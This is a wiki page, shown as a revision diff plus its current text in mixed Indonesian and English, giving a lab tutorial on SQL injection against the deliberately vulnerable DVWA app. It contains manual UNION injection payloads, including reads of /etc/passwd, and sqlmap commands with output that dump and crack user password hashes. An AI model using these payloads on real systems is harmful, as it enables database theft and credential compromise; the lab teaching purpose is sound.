Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"

From OnnoWiki
Jump to navigation Jump to search
(New page: Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/ I decided to do a write up on SQLMAP on my KALI install against DVWA on a Fedora virtual. I create...)
 
Line 1: Line 1:
 
Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
 
Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
  
 +
==Latar Belakang==
  
 +
Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.
  
  
I decided to do a write up on SQLMAP on my KALI install against DVWA on a Fedora virtual.  I created this for some people that I work with to show them that while tools are powerful knowing the manual process is just as valuable.
+
==Proses manual untuk test Vulnerability==
  
*******************************************
+
Cek apakah situs kita vulnerable
SQL MAP WALK THROUGH BY NULL REFERENCE
 
  
http://www.null-reference.com
+
1′ or ’2′=’2
  
USING DVWA AS AN EXAMPLE FOR THIS
+
Kita perlu melihat berapa banyak kolom sebelum ada error.
  
*******************************************
+
‘ and 1=1 union select 1,2 #
 +
‘ and 1=1 union select 1,2,3 #
  
*******************************************
+
Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.
Background
 
*******************************************
 
Before using SQLMAP it is best to see if you have an injection possibility. SQLMAP is a tool and just like any tool you should know the process manually before using it. The tool is only as good as the operator. All of the SQLMAP features can be done by hand without the tool, therefore know what you are doing before automating a process.
 
*******************************************
 
  
Manual Process To Test Vulnerability
+
Mari kita melakukan injection.
*******************************************
 
  
    Check if you it is vulnerable
+
‘ union SELECT 1, user() — ‘
        1′ or ’2′=’2
+
‘ and 1=1 union select database(),version() #
    We need to see how many columns actually get returned we will run the below syntax until we get an error (This is not required but just gives us some good information for further use)
+
‘ union SELECT 1, user() #
        ‘ and 1=1 union select 1,2 #
+
‘ and 1=1 union select null,table_schema from information_schema.tables #
        ‘ and 1=1 union select 1,2,3 #
+
‘ and 1=1 union select table_name,table_schema from information_schema.tables #
            This throws an error so we know we only have 2 columns getting returned.
+
‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ #
    Some other fun injections
+
‘ and 1=1 union select first_name,password from dvwa.users #
        ‘ union SELECT 1, user() — ‘
+
‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ #
        ‘ and 1=1 union select database(),version() #
+
‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ #
        ‘ union SELECT 1, user() #
+
‘ union select user, password FROM users #
        ‘ and 1=1 union select null,table_schema from information_schema.tables #
+
‘ union SELECT 1, load_file(‘/etc/hosts’) #
        ‘ and 1=1 union select table_name,table_schema from information_schema.tables #
+
‘ union SELECT 1, load_file(‘/etc/passwd’) #
        ‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ #
+
 
        ‘ and 1=1 union select first_name,password from dvwa.users #
+
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.
        ‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ #
+
 
        ‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ #
+
 
        ‘ union select user, password FROM users #
+
 
        ‘ union SELECT 1, load_file(‘/etc/hosts’) #
+
==Menggunakan SQLMAP==
        ‘ union SELECT 1, load_file(‘/etc/passwd’) #
 
  
Ok so now we know that 1,2,3 gave us an error so we know the recordset being returned only has 2 columns. This matches the output of the fields that are displayed when the record set is returned. THis means if we wanted with manual injection we can start doing alias statements
 
on a union to get the database user name tables etc. However this is where SQL map can make our lives easier.
 
*******************************************
 
SQL MAP
 
*******************************************
 
  
 
Parameters we will be using and what they mean
 
Parameters we will be using and what they mean

Revision as of 05:54, 14 November 2014

Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Latar Belakang

Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.


Proses manual untuk test Vulnerability

Cek apakah situs kita vulnerable

1′ or ’2′=’2

Kita perlu melihat berapa banyak kolom sebelum ada error.

‘ and 1=1 union select 1,2 #
‘ and 1=1 union select 1,2,3 #

Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.

Mari kita melakukan injection.

‘ union SELECT 1, user() — ‘
‘ and 1=1 union select database(),version() #
‘ union SELECT 1, user() #
‘ and 1=1 union select null,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ #
‘ and 1=1 union select first_name,password from dvwa.users #
‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ #
‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ #
‘ union select user, password FROM users #
‘ union SELECT 1, load_file(‘/etc/hosts’) #
‘ union SELECT 1, load_file(‘/etc/passwd’) #

Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.


Menggunakan SQLMAP

Parameters we will be using and what they mean

   -u This specifies the URL
   –cookie This will output (emulate) a cookie header
       For this we will need a couple of things which we can find with the firefox addon tamper data. We will need know the cookie header information just by running tamper data we can see that we have some session information that gets submitted so we will emulate this header Sample header we will emulate
           Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
   –dbs This will list Database names if successful
   -D This will specify the database
   –tables This will specify that we want a list of the tables from the database specified in the -D parm
   –columns This will list the columns in the –tables parm
   –current-user This will return the current user running SQL
   –users This will return back a list of all users in SQL
   –passwords This will return back a hash of the passwords for the
   SQL instance

Execution examples

sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ –dbs

Returns [15:17:52] [INFO] fetching database names available databases [4]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa –tables

Returns [15:18:19] [INFO] fetching tables for database: ‘dvwa’ Database: dvwa [2 tables] +———–+ | guestbook | | users | +———–+ sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa -T users –columns

Returns [15:19:14] [INFO] fetching columns for table ‘users’ in database ‘dvwa’ Database: dvwa Table: users [6 columns] +————+————-+ | Column | Type | +————+————-+ | user | varchar(15) | | avatar | varchar(70) | | first_name | varchar(15) | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +————+————-+ sqlmap -u ‘http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#’ –cookie=”security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7″ -D dvwa -T users –dump

–dump will dump the data if there are passwords that are hashed depending on the version of SQLMAP you have will prompt to crack the passwords. You can specify your own dictionary or you can use the one that they specify. However the base dictionary cracks all the user passwords

See the output

[15:21:44] [INFO] starting dictionary-based cracking (md5_generic_passwd) [15:21:44] [INFO] starting 4 processes [15:21:47] [INFO] cracked password ‘abc123′ for hash ‘e99a18c428cb38d5f260853678922e03′ [15:21:50] [INFO] cracked password ‘charley’ for hash ’8d3533d75ae2c3966d7e0d4fcc69216b’ [15:21:53] [INFO] cracked password ‘letmein’ for hash ’0d107d09f5bbe40cade3de5c71e9e9b7′ [15:21:55] [INFO] cracked password ‘password’ for hash ’5f4dcc3b5aa765d61d8327deb882cf99′ Database: dvwa Table: users [5 entries] +———+———+———————————————————–+———–+————+ | user_id | user | password | last_name | first_name | +———+———+———————————————————–+———–+————+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb| e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +———+———+———————————————————–+———–+————+

There you have it you know just gained access to all the sql users.




Referensi